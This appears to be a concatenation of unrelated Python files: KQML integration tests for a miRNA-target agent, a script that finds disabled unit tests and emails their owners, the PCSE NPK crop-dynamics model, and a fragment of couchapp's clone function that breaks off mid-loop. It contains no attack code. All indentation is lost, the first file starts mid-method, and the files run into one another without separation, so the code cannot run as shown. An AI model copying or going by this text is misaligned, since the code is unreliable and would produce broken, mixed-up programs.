# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-148')
get_mirnas(mirna)
print('mirna=', mirna)
target = agent_clj_from_text('DNMT1')
content = KQMLList('FIND-EVIDENCE-MIRNA-TARGET')
content.set('miRNA', mirna)
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'NO_SIMILAR_MIRNA', output
#test family name
#show me evidence that miR-148a-3p targets STAT?
class TestFindEvidenceMirnaTarget4(_IntegrationTest):
def __init__(self, *args):
super(TestFindEvidenceMirnaTarget4, self).__init__(TFTA_Module)
def create_message(self):
# Here we create a KQML request that the TFTA needs to respond to
mirna = make_mirna_cljson('miR-148a-3p')
get_mirnas(mirna)
print('mirna=', mirna)
target = agent_clj_from_text('STAT')
content = KQMLList('FIND-EVIDENCE-MIRNA-TARGET')
content.set('miRNA', mirna)
content.set('target', target)
return get_request(content), content
def check_response_to_message(self, output):
assert output.head() == 'FAILURE', output
assert output.get('reason') == 'FAMILY_NAME', output
print("len(output.get('clarification'))=", len(output.get('clarification')))
print("len(output.get('clarification').get('as'))=", len(output.get('clarification').get('as')))
assert len(output.get('clarification')) == 5, output
assert len(output.get('clarification').get('as')) == 8, output
#!/usr/bin/env python
#
# $Id: check_disabled_tests.py 9317 2011-06-10 02:09:04Z nathan_george $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import os
import sys
buildscriptDir = os.path.dirname(__file__)
buildscriptDir = os.path.abspath(os.path.join(buildscriptDir, os.path.pardir))
sys.path.append(buildscriptDir)
import re
import sandbox
import optparse
import smtplib
import svnwrap
import codescan
import xmail
import metadata
from ioutil import *
from disabled_unit_test import DisabledUnitTest
EXT_PAT = re.compile(r'.*\.(cpp|java|h|py)$', re.IGNORECASE)
_LBL_PAT = re.compile(r'^\s*([a-z]+):\s*(.*?)\s*$', re.IGNORECASE)
_DISABLED_DESCRIPTOR_MARKER = 'UNIT TEST TEMPORARILY DISABLED'
DISABLED_PAT = re.compile('/\\*[-_\\.\\* \t\r\n]*%s.*?\\*/' % _DISABLED_DESCRIPTOR_MARKER, re.DOTALL)
NON_RECURSING_FOLDERS_PAT = re.compile(r'(.svn|ext(js)?|boost|.metadata|buildtools|Debug|Release|psa-htdocs|sample-data|data|build|Archive|Dist|Install|bin|lib)$')
FROM = 'Disabled Unit Test Scanner <code.scan@example.com>' ## TODO make configurable
DISABLED_JAVA_PAT = re.compile('^\s*//\s*@Test', re.MULTILINE | re.DOTALL)
parser = optparse.OptionParser('Usage: %prog [options] [path]\n\nCheck for disabled unit tests; optionally nag developers to fix them.')
parser.add_option('--nag', dest="nag", action="store_true", help="Emit emails nagging people to fix disabled tests.")
xmail.addMailOptions(parser, to=False)
def getUnique(items):
uniques = {}
for x in items:
uniques[x] = 1
return uniques.keys()[:]
def getAddressList(txt):
items = []
if txt:
txt = txt.replace(';', ',')
items = [x.strip() for x in txt.split(',') if x.strip()]
items = getUnique(items)
items.sort()
return items
def getRawAddress(address):
i = address.find('<')
if i > -1:
j = address.find('>', i)
if j == -1:
return address[i + 1:].strip()
return address[i + 1:j].strip()
return address.strip()
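# Hedged illustration (not part of the original script): getRawAddress strips
# an RFC 2822 style display name down to the bare address.
def _demo_raw_address():
    assert getRawAddress('Jane Doe <jane@example.com>') == 'jane@example.com'
    assert getRawAddress(' bob@example.com ') == 'bob@example.com'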
def nag(dt, msg, options):
if dt.owner or options.cc:
fname = os.path.basename(dt.path)
subject = 'disabled unit test near %s, line %d' % (fname, dt.lineNum)
msg = ('''You are one of the people responsible for re-enabling this test. Please
get the test working, re-enable it, remove the comment that flags it as
disabled, and mark ticket #%s fixed. The sooner you can do this, the better.
Until the test is re-enabled, an important signal about the integrity of our
code is being suppressed with each build+test cycle.
''' % dt.ticket) + msg
xmail.sendmail(msg, to=dt.owner, sender=FROM, subject=subject, options=options)
else:
sys.stderr.write('%s(%d): Error: disabled unit test but nobody can be nagged!\n' % (dt.path, dt.lineNum))
_CPP_TESTNAME_PAT = re.compile(r'^\s*(SIMPLE_TEST\s*\(\s*(.*?)\s*\)|class\s+([a-zA-Z_0-9]+)\s*:\s*(public|protected|private)\s+[a-zA-Z_0-9]+Test)', re.MULTILINE | re.DOTALL)
_JAVA_TESTNAME_PAT = re.compile(r'^\s*public\s+void\s+([a-zA-Z_0-9]+)\s*\(', re.MULTILINE | re.DOTALL)
def _extractTestNameFromMatch(m, java):
if java:
return m.group(1)
elif m.group(1).find('SIMPLE_TEST') > -1:
return m.group(2)
else:
return m.group(3)
def getNameOfNextTestMethod(path, txt, offset):
i = min(len(txt), offset + 500)
nextFewLines = txt[offset:i]
java = path.endswith('.java')
if java:
testnamePat = _JAVA_TESTNAME_PAT
else:
testnamePat = _CPP_TESTNAME_PAT
m = testnamePat.search(nextFewLines)
if m:
return _extractTestNameFromMatch(m, java)
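# Hedged illustration (example test name only): what the C++ pattern extracts
# from a SIMPLE_TEST declaration.
def _demo_testname_extraction():
    m = _CPP_TESTNAME_PAT.search('SIMPLE_TEST(checksums_match)')
    return _extractTestNameFromMatch(m, java=False)   # -> 'checksums_match'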
_ALL_OR_ENTIRE_PAT = re.compile('(^|\s+)(all($|\s+)|entire\s+)', re.IGNORECASE)
def disabledTestIsProperlyDocumented(testName, disabledTests):
if not testName:
return False
testName = testName.lower()
for dut in disabledTests:
if _ALL_OR_ENTIRE_PAT.search(dut.which):
return True
regex = re.compile(r'\b%s\b' % testName, re.IGNORECASE)
if regex.search(dut.which):
return True
return False
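# Hedged sketch of the matching rules above; _Stub stands in for
# DisabledUnitTest, which exposes the descriptor's "which" text as .which.
def _demo_documented():
    class _Stub:
        def __init__(self, which):
            self.which = which
    assert disabledTestIsProperlyDocumented('testFoo', [_Stub('all tests')])
    assert disabledTestIsProperlyDocumented('testFoo', [_Stub('testFoo, testBar')])
    assert not disabledTestIsProperlyDocumented('testBaz', [_Stub('testFoo')])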
def checkFile(fpath):
#print('checking %s' % fpath)
disabledTests = []
txt = read_file(fpath)
# First, look through for tests that are disabled in the way we expect.
standardDisableCount = 0
for match in DISABLED_PAT.finditer(txt):
disabledTests.append(DisabledUnitTest(fpath, txt, match.start(), match.end()))
standardDisableCount += 1
improper = []
java = bool(fpath.endswith('.java'))
# Now, scan through the file looking for stuff that's maybe disabled in the wrong way.
# We do this so that over time, everyone who's working in the codebase converges on
# the same best practices, instead of circumventing the system.
if java:
# In java, look for //@Test where we can't tie the associated method to a
# standard comment about being disabled.
for match in DISABLED_JAVA_PAT.finditer(txt):
name = getNameOfNextTestMethod(fpath, txt, match.start())
if not disabledTestIsProperlyDocumented(name, disabledTests):
tuple = (name, 1 + codescan.getLineNumForOffset(txt, match.start()))
improper.append(tuple)
nextInactiveBlock = codescan.getNextInactiveJavaBlock
testnamePat = _JAVA_TESTNAME_PAT
elif fpath.endswith('.cpp') or fpath.endswith('.h'):
nextInactiveBlock = codescan.getNextInactiveCppBlock
testnamePat = _CPP_TESTNAME_PAT
else:
nextInactiveBlock = _findNoInactiveBlocks
testnamePat = None
# In both java and C++, look for methods that have been completely commented
# out. In C++, also check for methods that have been #ifdef'ed out.
i = 0
while testnamePat:
range = nextInactiveBlock(txt, i)
if not range:
break
block = txt[range[0]:range[1]]
for match in testnamePat.finditer(block):
name = _extractTestNameFromMatch(match, java)
if not disabledTestIsProperlyDocumented(name, disabledTests):
lineNum = 1 + codescan.getLineNumForOffset(txt, range[0] + match.start())
tuple = (name, lineNum)
improper.append(tuple)
i = range[1]
return disabledTests, improper
def _findNoInactiveBlocks(x, y):
return -1, -1
class TestFolderOnlyRecurser:
def select(self, folder, dirs):
# We're removing items from dirs rather than simply resetting it,
# because we have to modify the object *in place* in order to
# prevent recursion.
test_folder = None
if 'test' in dirs:
test_folder = 'test'
elif 'Test' in dirs:
test_folder = 'Test'
if test_folder:
i = len(dirs) - 1
while i > -1:
d = dirs[i]
if d != test_folder:
dirs.remove(d)
i -= 1
#print('setting recursable folders under %s to %s' % (folder, str(dirs)))
return dirs
class TestCheckVisitor:
def __init__(self):
self.disabledTests = []
self.improperCount = 0
self.improperSummary = ''
def visit(self, folder, item, relativePath):
#print('visited %s' % item)
# If we're in a test folder, or anywhere below it...
if folder.lower().find('/test/') > -1:
disabledTestsInThisFile, improper = checkFile(folder + item)
if disabledTestsInThisFile:
self.disabledTests.extend(disabledTestsInThisFile)
if improper:
self.improperCount += len(improper)
for tuple in improper:
self.improperSummary += '%s(%d): Warning: disabled unit test %s seems improperly documented.\n' % (relativePath + item, tuple[1], tuple[0])
info = svnwrap.Info(folder + item)
self.improperSummary += ' Last changed revision: %s\n' % info.lastChangedRev
self.improperSummary += ' Last changed by: %s\n' % info.lastChangedAuthor
self.improperSummary += ' Last changed date: %s\n' % info.lastChangedDate
self.improperSummary += '\n'
def check(path, options):
if not os.path.isdir(path):
sys.stderr.write('%s is not a valid folder.\n' % path)
return 1
path = norm_folder(path)
print('Checking for disabled unit tests in %s...\n' % path)
visitor = TestCheckVisitor()
checkedFiles, checkedFolders = metadata.visit(path, visitor)
rootLen = len(path)
if visitor.improperSummary:
print(visitor.improperSummary)
shouldNag = xmail.hasDest(options) or xmail.hasHostInfo(options)
for dt in visitor.disabledTests:
txt = '%s(%d): Warning: disabled unit test.\n' % (dt.path[rootLen:], dt.lineNum)
txt += ' ' + str(dt).replace('\n', '\n ')
print(txt + '\n')
if visitor.improperSummary:
txt += '\n\nIn addition, %d unit tests appear to be disabled but improperly documented.\n' % visitor.improperCount
txt += 'Please consider fixing these as well:\n\n'
txt += visitor.improperSummary
if shouldNag:
nag(dt, txt, options)
print('Checked %d files in %d folders.\n Found %d correctly disabled tests.\n Found %d tests that seem to be disabled but not documented.' % (checkedFiles, checkedFolders, len(visitor.disabledTests), visitor.improperCount))
if __name__ == '__main__':
( options, args ) = parser.parse_args()
if args:
folder = args[0]
else:
folder = sandbox.current.get_test_root()
exitCode = check(folder, options)
sys.exit(exitCode)
#!/usr/bin/env python
from .. import exceptions as exc
from ..traitlets import Float, Int, Instance, AfgenTrait
from ..decorators import prepare_rates, prepare_states
from ..base_classes import ParamTemplate, StatesTemplate, RatesTemplate, \
SimulationObject
from .nutrients import NPK_Translocation
from .nutrients import NPK_Demand_Uptake
class NPK_Crop_Dynamics(SimulationObject):
"""Implementation of overall NPK crop dynamics.
NPK_Crop_Dynamics implements the overall logic of N/P/K book-keeping within the
crop.
**Simulation parameters**
=========== ================================================ ======= ======================
Name Description Type Unit
=========== ================================================ ======= ======================
DVS_NPK_STOP DVS above which no crop N-P-K uptake occurs SCr -
NMAXLV_TB Maximum N concentration in leaves as TCr kg N kg-1 dry biomass
function of dvs
PMAXLV_TB As for P TCr kg P kg-1 dry biomass
KMAXLV_TB As for K TCr kg K kg-1 dry biomass
NMAXRT_FR Maximum N concentration in roots as fraction SCr -
of maximum N concentration in leaves
PMAXRT_FR As for P SCr -
KMAXRT_FR As for K SCr -
NMAXST_FR Maximum N concentration in stems as fraction SCr -
of maximum N concentration in leaves
KMAXST_FR As for K SCr -
PMAXST_FR As for P SCr -
NRESIDLV Residual N fraction in leaves SCr kg N kg-1 dry biomass
PRESIDLV Residual P fraction in leaves SCr kg P kg-1 dry biomass
KRESIDLV Residual K fraction in leaves SCr kg K kg-1 dry biomass
NRESIDRT Residual N fraction in roots SCr kg N kg-1 dry biomass
PRESIDRT Residual P fraction in roots SCr kg P kg-1 dry biomass
KRESIDRT Residual K fraction in roots SCr kg K kg-1 dry biomass
NRESIDST Residual N fraction in stems SCr kg N kg-1 dry biomass
PRESIDST Residual P fraction in stems SCr kg P kg-1 dry biomass
KRESIDST Residual K fraction in stems SCr kg K kg-1 dry biomass
=========== ================================================ ======= ======================
**State variables**
======= ================================================= ==== ============
Name Description Pbl Unit
======= ================================================= ==== ============
ANLV Actual N amount in living leaves Y |kg N ha-1|
APLV Actual P amount in living leaves Y |kg P ha-1|
AKLV Actual K amount in living leaves Y |kg K ha-1|
ANST Actual N amount in living stems Y |kg N ha-1|
APST Actual P amount in living stems Y |kg P ha-1|
AKST Actual K amount in living stems Y |kg K ha-1|
ANSO Actual N amount in living storage organs Y |kg N ha-1|
APSO Actual P amount in living storage organs Y |kg P ha-1|
AKSO Actual K amount in living storage organs Y |kg K ha-1|
ANRT Actual N amount in living roots Y |kg N ha-1|
APRT Actual P amount in living roots Y |kg P ha-1|
AKRT Actual K amount in living roots Y |kg K ha-1|
NUPTAKE_T total absorbed N amount N |kg N ha-1|
PUPTAKE_T total absorbed P amount N |kg P ha-1|
KUPTAKE_T total absorbed K amount N |kg K ha-1|
NFIX_T total biologically fixed N amount N |kg N ha-1|
======= ================================================= ==== ============
**Rate variables**
======= ================================================= ==== ============
Name Description Pbl Unit
======= ================================================= ==== ============
RNLV Weight increase (N) in leaves N |kg ha-1 d-1|
RPLV Weight increase (P) in leaves N |kg ha-1 d-1|
RKLV Weight increase (K) in leaves N |kg ha-1 d-1|
RNST Weight increase (N) in stems N |kg ha-1 d-1|
RPST Weight increase (P) in stems N |kg ha-1 d-1|
RKST Weight increase (K) in stems N |kg ha-1 d-1|
RNRT Weight increase (N) in roots N |kg ha-1 d-1|
RPRT Weight increase (P) in roots N |kg ha-1 d-1|
RKRT Weight increase (K) in roots N |kg ha-1 d-1|
RNSO Weight increase (N) in storage organs N |kg ha-1 d-1|
RPSO Weight increase (P) in storage organs N |kg ha-1 d-1|
RKSO Weight increase (K) in storage organs N |kg ha-1 d-1|
RNDLV Rate of N loss in leaves N |kg ha-1 d-1|
RPDLV as for P N |kg ha-1 d-1|
RKDLV as for K N |kg ha-1 d-1|
RNDST Rate of N loss in stems N |kg ha-1 d-1|
RPDST as for P N |kg ha-1 d-1|
RKDST as for K N |kg ha-1 d-1|
RNDRT Rate of N loss in roots N |kg ha-1 d-1|
RPDRT as for P N |kg ha-1 d-1|
RKDRT as for K N |kg ha-1 d-1|
RNLOSS N loss due to senescence N |kg ha-1 d-1|
RPLOSS P loss due to senescence N |kg ha-1 d-1|
RKLOSS K loss due to senescence N |kg ha-1 d-1|
======= ================================================= ==== ============
**Signals sent or handled**
None
**External dependencies**
======= =================================== ==================== ============
Name Description Provided by Unit
======= =================================== ==================== ============
DVS Crop development stage DVS_Phenology -
WLV Dry weight of living leaves WOFOST_Leaf_Dynamics |kg ha-1|
WRT Dry weight of living roots WOFOST_Root_Dynamics |kg ha-1|
WST Dry weight of living stems WOFOST_Stem_Dynamics |kg ha-1|
DRLV Death rate of leaves WOFOST_Leaf_Dynamics |kg ha-1 d-1|
DRRT Death rate of roots WOFOST_Root_Dynamics |kg ha-1 d-1|
DRST Death rate of stems WOFOST_Stem_Dynamics |kg ha-1 d-1|
======= =================================== ==================== ============
"""
translocation = Instance(SimulationObject)
demand_uptake = Instance(SimulationObject)
ANLVI = Float(-99.) # initial N amount in leaves
ANSTI = Float(-99.) # initial N amount in stems
ANRTI = Float(-99.) # initial N amount in roots
ANSOI = Float(-99.) # initial N amount in storage organs
APLVI = Float(-99.) # initial P amount in leaves
APSTI = Float(-99.) # initial P amount in stems
APRTI = Float(-99.) # initial P amount in roots
APSOI = Float(-99.) # initial P amount in storage organs
AKLVI = Float(-99.) # initial K amount in leaves
AKSTI = Float(-99.) # initial K amount in stems
AKRTI = Float(-99.) # initial K amount in roots
AKSOI = Float(-99.) # initial K amount in storage organs
class Parameters(ParamTemplate):
DVS_NPK_STOP = Float(-99.)
NMAXLV_TB = AfgenTrait()
PMAXLV_TB = AfgenTrait()
KMAXLV_TB = AfgenTrait()
NMAXST_FR = Float(-99.)
NMAXRT_FR = Float(-99.)
PMAXST_FR = Float(-99.)
PMAXRT_FR = Float(-99.)
KMAXST_FR = Float(-99.)
KMAXRT_FR = Float(-99.)
NRESIDLV = Float(-99.) # residual N fraction in leaves [kg N kg-1 dry biomass]
NRESIDST = Float(-99.) # residual N fraction in stems [kg N kg-1 dry biomass]
NRESIDRT = Float(-99.) # residual N fraction in roots [kg N kg-1 dry biomass]
PRESIDLV = Float(-99.) # residual P fraction in leaves [kg P kg-1 dry biomass]
PRESIDST = Float(-99.) # residual P fraction in stems [kg P kg-1 dry biomass]
PRESIDRT = Float(-99.) # residual P fraction in roots [kg P kg-1 dry biomass]
KRESIDLV = Float(-99.) # residual K fraction in leaves [kg K kg-1 dry biomass]
KRESIDST = Float(-99.) # residual K fraction in stems [kg K kg-1 dry biomass]
KRESIDRT = Float(-99.) # residual K fraction in roots [kg K kg-1 dry biomass]
class StateVariables(StatesTemplate):
ANLV = Float(-99.)  # N amount in leaves [kg N ha-1]
APLV = Float(-99.)  # P amount in leaves [kg P ha-1]
AKLV = Float(-99.)  # K amount in leaves [kg K ha-1]
ANST = Float(-99.)  # N amount in stems [kg N ha-1]
APST = Float(-99.)  # P amount in stems [kg P ha-1]
AKST = Float(-99.)  # K amount in stems [kg K ha-1]
ANSO = Float(-99.)  # N amount in storage organs [kg N ha-1]
APSO = Float(-99.)  # P amount in storage organs [kg P ha-1]
AKSO = Float(-99.)  # K amount in storage organs [kg K ha-1]
ANRT = Float(-99.)  # N amount in roots [kg N ha-1]
APRT = Float(-99.)  # P amount in roots [kg P ha-1]
AKRT = Float(-99.)  # K amount in roots [kg K ha-1]
NUPTAKE_T = Float(-99.)  # total absorbed N amount [kg N ha-1]
PUPTAKE_T = Float(-99.)  # total absorbed P amount [kg P ha-1]
KUPTAKE_T = Float(-99.)  # total absorbed K amount [kg K ha-1]
NFIX_T = Float(-99.)  # total biologically fixed N amount [kg N ha-1]
NLOSSES_T = Float(-99.)  # total N lost by senescence [kg N ha-1]
PLOSSES_T = Float(-99.)  # total P lost by senescence [kg P ha-1]
KLOSSES_T = Float(-99.)  # total K lost by senescence [kg K ha-1]
class RateVariables(RatesTemplate):
RNLV = Float(-99.) # Net rates of NPK in different plant organs
RPLV = Float(-99.)
RKLV = Float(-99.)
RNST = Float(-99.)
RPST = Float(-99.)
RKST = Float(-99.)
RNRT = Float(-99.)
RPRT = Float(-99.)
RKRT = Float(-99.)
RNSO = Float(-99.)
RPSO = Float(-99.)
RKSO = Float(-99.)
RNDLV = Float(-99.) # N loss rate leaves [kg ha-1 d-1]
RNDST = Float(-99.) # N loss rate stems [kg ha-1 d-1]
RNDRT = Float(-99.) # N loss rate roots [kg ha-1 d-1]
RPDLV = Float(-99.) # P loss rate leaves [kg ha-1 d-1]
RPDST = Float(-99.) # P loss rate stems [kg ha-1 d-1]
RPDRT = Float(-99.) # P loss rate roots [kg ha-1 d-1]
RKDLV = Float(-99.) # K loss rate leaves [kg ha-1 d-1]
RKDST = Float(-99.) # K loss rate stems [kg ha-1 d-1]
RKDRT = Float(-99.) # K loss rate roots [kg ha-1 d-1]
RNLOSS = Float(-99.)  # total N loss due to senescence [kg N ha-1 d-1]
RPLOSS = Float(-99.)  # total P loss due to senescence [kg P ha-1 d-1]
RKLOSS = Float(-99.)  # total K loss due to senescence [kg K ha-1 d-1]
def initialize(self, day, kiosk, parvalues):
"""
:param day: start date of the simulation
:param kiosk: variable kiosk of this PCSE instance
:param parvalues: dictionary with parameters as key/value pairs
"""
self.params = self.Parameters(parvalues)
self.rates = self.RateVariables(kiosk)
self.kiosk = kiosk
# Initialize components of the npk_crop_dynamics
self.translocation = NPK_Translocation(day, kiosk, parvalues)
self.demand_uptake = NPK_Demand_Uptake(day, kiosk, parvalues)
# INITIAL STATES
params = self.params
DVS = self.kiosk["DVS"]
WLV = self.kiosk["WLV"]
WST = self.kiosk["WST"]
WRT = self.kiosk["WRT"]
# Initial amounts
self.ANLVI = ANLV = WLV * params.NMAXLV_TB(DVS)
self.ANSTI = ANST = WST * params.NMAXLV_TB(DVS) * params.NMAXST_FR
self.ANRTI = ANRT = WRT * params.NMAXLV_TB(DVS) * params.NMAXRT_FR
self.ANSOI = ANSO = 0.
self.APLVI = APLV = WLV * params.PMAXLV_TB(DVS)
self.APSTI = APST = WST * params.PMAXLV_TB(DVS) * params.PMAXST_FR
self.APRTI = APRT = WRT * params.PMAXLV_TB(DVS) * params.PMAXRT_FR
self.APSOI = APSO = 0.
self.AKLVI = AKLV = WLV * params.KMAXLV_TB(DVS)
self.AKSTI = AKST = WST * params.KMAXLV_TB(DVS) * params.KMAXST_FR
self.AKRTI = AKRT = WRT * params.KMAXLV_TB(DVS) * params.KMAXRT_FR
self.AKSOI = AKSO = 0.
self.states = self.StateVariables(kiosk,
publish=["ANLV", "ANST", "ANRT", "ANSO", "APLV", "APST",
"APRT", "APSO", "AKLV", "AKST", "AKRT", "AKSO"],
ANLV=ANLV, ANST=ANST, ANRT=ANRT, ANSO=ANSO,
APLV=APLV, APST=APST, APRT=APRT, APSO=APSO,
AKLV=AKLV, AKST=AKST, AKRT=AKRT, AKSO=AKSO,
NUPTAKE_T=0., PUPTAKE_T=0., KUPTAKE_T=0., NFIX_T=0.,
NLOSSES_T=0., PLOSSES_T=0., KLOSSES_T=0.)
@prepare_rates
def calc_rates(self, day, drv):
rates = self.rates
params = self.params
self.demand_uptake.calc_rates(day, drv)
self.translocation.calc_rates(day, drv)
# Compute loss of NPK due to death of plant material
DRLV = self.kiosk["DRLV"] # death rate leaves [kg dry matter ha-1 d-1]
DRST = self.kiosk["DRST"] # death rate stems [kg dry matter ha-1 d-1]
DRRT = self.kiosk["DRRT"] # death rate roots [kg dry matter ha-1 d-1]
rates.RNDLV = params.NRESIDLV * DRLV
rates.RNDST = params.NRESIDST * DRST
rates.RNDRT = params.NRESIDRT * DRRT
rates.RPDLV = params.PRESIDLV * DRLV
rates.RPDST = params.PRESIDST * DRST
rates.RPDRT = params.PRESIDRT * DRRT
rates.RKDLV = params.KRESIDLV * DRLV
rates.RKDST = params.KRESIDST * DRST
rates.RKDRT = params.KRESIDRT * DRRT
# N rates in leaves, stems, root and storage organs computed as
# uptake - translocation - death.
# except for storage organs which only take up as a result of translocation.
rates.RNLV = self.kiosk["RNULV"] - self.kiosk["RNTLV"] - rates.RNDLV
rates.RNST = self.kiosk["RNUST"] - self.kiosk["RNTST"] - rates.RNDST
rates.RNRT = self.kiosk["RNURT"] - self.kiosk["RNTRT"] - rates.RNDRT
rates.RNSO = self.kiosk["RNUSO"]
# P rates in leaves, stems, root and storage organs
rates.RPLV = self.kiosk["RPULV"] - self.kiosk["RPTLV"] - rates.RPDLV
rates.RPST = self.kiosk["RPUST"] - self.kiosk["RPTST"] - rates.RPDST
rates.RPRT = self.kiosk["RPURT"] - self.kiosk["RPTRT"] - rates.RPDRT
rates.RPSO = self.kiosk["RPUSO"]
# K rates in leaves, stems, root and storage organs
rates.RKLV = self.kiosk["RKULV"] - self.kiosk["RKTLV"] - rates.RKDLV
rates.RKST = self.kiosk["RKUST"] - self.kiosk["RKTST"] - rates.RKDST
rates.RKRT = self.kiosk["RKURT"] - self.kiosk["RKTRT"] - rates.RKDRT
rates.RKSO = self.kiosk["RKUSO"]
rates.RNLOSS = rates.RNDLV + rates.RNDST + rates.RNDRT
rates.RPLOSS = rates.RPDLV + rates.RPDST + rates.RPDRT
rates.RKLOSS = rates.RKDLV + rates.RKDST + rates.RKDRT
self._check_N_balance(day)
self._check_P_balance(day)
self._check_K_balance(day)
@prepare_states
def integrate(self, day, delt=1.0):
rates = self.rates
states = self.states
# N amount in leaves, stems, root and storage organs
states.ANLV += rates.RNLV
states.ANST += rates.RNST
states.ANRT += rates.RNRT
states.ANSO += rates.RNSO
# P amount in leaves, stems, root and storage organs
states.APLV += rates.RPLV
states.APST += rates.RPST
states.APRT += rates.RPRT
states.APSO += rates.RPSO
# K amount in leaves, stems, root and storage organs
states.AKLV += rates.RKLV
states.AKST += rates.RKST
states.AKRT += rates.RKRT
states.AKSO += rates.RKSO
self.translocation.integrate(day, delt)
self.demand_uptake.integrate(day, delt)
# total NPK uptake from soil
states.NUPTAKE_T += self.kiosk["RNUPTAKE"]
states.PUPTAKE_T += self.kiosk["RPUPTAKE"]
states.KUPTAKE_T += self.kiosk["RKUPTAKE"]
states.NFIX_T += self.kiosk["RNFIX"]
states.NLOSSES_T += rates.RNLOSS
states.PLOSSES_T += rates.RPLOSS
states.KLOSSES_T += rates.RKLOSS
def _check_N_balance(self, day):
states = self.states
NUPTAKE_T = states.NUPTAKE_T
NFIX_T = states.NFIX_T
ANLVI = self.ANLVI
ANSTI = self.ANSTI
ANRTI = self.ANRTI
ANSOI = self.ANSOI
ANLV = states.ANLV
ANST = states.ANST
ANRT = states.ANRT
ANSO = states.ANSO
NLOSST = states.NLOSSES_T
checksum = abs(NUPTAKE_T + NFIX_T + (ANLVI + ANSTI + ANRTI + ANSOI) -
(ANLV + ANST + ANRT + ANSO + NLOSST))
if checksum >= 1.:
msg = "N flows not balanced on day %s\n" % day
msg += "Checksum: %f, NUPTAKE_T: %f, NFIX_T: %f\n" % (checksum, NUPTAKE_T, NFIX_T)
msg += "ANLVI: %f, ANSTI: %f, ANRTI: %f, ANSOI: %f\n" %(ANLVI, ANSTI, ANRTI, ANSOI)
msg += "ANLV: %f, ANST: %f, ANRT: %f, ANSO: %f\n" % (ANLV, ANST, ANRT, ANSO)
msg += "NLOSST: %f\n" %(NLOSST)
raise exc.NutrientBalanceError(msg)
def _check_P_balance(self, day):
states = self.states
PUPTAKE_T = states.PUPTAKE_T
APLVI = self.APLVI
APSTI = self.APSTI
APRTI = self.APRTI
APSOI = self.APSOI
APLV = states.APLV
APST = states.APST
APRT = states.APRT
APSO = states.APSO
PLOSST = states.PLOSSES_T
checksum = abs(PUPTAKE_T + (APLVI + APSTI + APRTI + APSOI) -
(APLV + APST + APRT + APSO + PLOSST))
if checksum >= 1.:
msg = "P flows not balanced on day %s\n" % day
msg += "Checksum: %f, PUPTAKE_T: %f\n" % (checksum, PUPTAKE_T)
msg += "APLVI: %f, APSTI: %f, APRTI: %f, APSOI: %f\n" % (APLVI, APSTI, APRTI, APSOI)
msg += "APLV: %f, APST: %f, APRT: %f, APSO: %f\n" % (APLV, APST, APRT, APSO)
msg += "PLOSST: %f\n" %(PLOSST)
raise exc.NutrientBalanceError(msg)
def _check_K_balance(self, day):
states = self.states
KUPTAKE_T = states.KUPTAKE_T
AKLVI = self.AKLVI
AKSTI = self.AKSTI
AKRTI = self.AKRTI
AKSOI = self.AKSOI
AKLV = states.AKLV
AKST = states.AKST
AKRT = states.AKRT
AKSO = states.AKSO
KLOSST = states.KLOSSES_T
checksum = abs(KUPTAKE_T + (AKLVI + AKSTI + AKRTI + AKSOI) -
(AKLV + AKST + AKRT + AKSO + KLOSST))
if checksum >= 1.:
msg = "K flows not balanced on day %s\n" % day
msg += "Checksum: %f, KUPTAKE_T: %f\n" %(checksum, KUPTAKE_T)
msg += "AKLVI: %f, AKSTI: %f, AKRTI: %f, AKSOI: %f\n" % (AKLVI, AKSTI, AKRTI, AKSOI)
msg += "AKLV: %f, AKST: %f, AKRT: %f, AKSO: %f\n" % (AKLV, AKST, AKRT, AKSO)
msg += "KLOSST: %f\n" %(KLOSST)
raise exc.NutrientBalanceError(msg)
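
# --- Illustrative sketch (not part of PCSE): the _check_N/P/K_balance methods
# above all verify the same mass-balance identity, e.g. for nitrogen:
#
#     NUPTAKE_T + NFIX_T + (initial organ amounts)
#         == (current organ amounts) + NLOSSES_T     (within 1 kg N ha-1)
#
# A minimal standalone version of that bookkeeping, with made-up numbers:
def _nutrient_balance_residual(uptake, fixation, initial_amounts, current_amounts, losses):
    """Residual of the nutrient mass balance in kg ha-1 (0.0 means balanced)."""
    return (uptake + fixation + sum(initial_amounts)) - (sum(current_amounts) + losses)

# 10 kg uptake + 2 kg fixation + 3 kg initially present = 14 kg in organs + 1 kg lost
assert abs(_nutrient_balance_residual(10., 2., [1., 1., 1., 0.], [7., 3., 2., 2.], 1.)) < 1.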
# -*- coding: utf-8 -*-
#
# This file is part of couchapp released under the Apache 2 license.
# See the NOTICE for more information.
from __future__ import with_statement
import base64
import copy
from hashlib import md5
import logging
import os
import os.path
from couchapp.errors import AppError
from couchapp import client
from couchapp import util
logger = logging.getLogger(__name__)
if os.name == 'nt':
def _replace_slash(name):
return name.replace("/", "\\")
else:
def _replace_slash(name):
return name
def clone(source, dest=None, rev=None):
"""
Clone an application from a given design document URL.
:attr source: URL of the design doc, e.g. ``http://127.0.0.1:5984/db/_design/app``
:attr dest: directory to clone into; defaults to the design doc id
:attr rev: optional revision of the design doc to fetch (latest if omitted)
Raises ``AppError`` if ``source`` isn't a valid design doc URL.
"""
try:
dburl, docid = source.split('_design/')
except ValueError:
raise AppError("%s isn't a valid source" % source)
if not dest:
dest = docid
path = os.path.normpath(os.path.join(os.getcwd(), dest))
if not os.path.exists(path):
os.makedirs(path)
db = client.Database(dburl[:-1], create=False)
if not rev:
doc = db.open_doc("_design/%s" % docid)
else:
doc = db.open_doc("_design/%s" % docid, rev=rev)
docid = doc['_id']
metadata = doc.get('couchapp', {})
# get manifest
manifest = metadata.get('manifest', {})
# get signatures
signatures = metadata.get('signatures', {})
# get objects refs
objects = metadata.get('objects', {})
# create files from manifest
if manifest:
for filename in manifest:
logger.debug("clone property: %s" % filename)
filepath = os.path.join(path, filename)
if filename.endswith('/'):
if not os.path.isdir(filepath):
os.makedirs(filepath)
elif filename == "couchapp.json":
continue
else:
parts = util.split_path(filename)
fname = parts.pop()
v = doc
while 1:
try:
for key in parts:
v = v[key]
except KeyError:
break
# remove extension
last_key, ext = os.path.splitext(fname)
# make sure key exist
try:
content = v[last_key]
except KeyError:
break
if isinstance(content, basestring):
_ref = md5(util.to_bytestring(content)).hexdigest()
if objects and _ref in objects:
content = objects[_ref]
if content.startswith('base64-encoded;'):
content = base64.b64decode(content[15:])
if fname.endswith('.json'):
content = util.json.dumps(content).encode('utf-8')
del v[last_key]
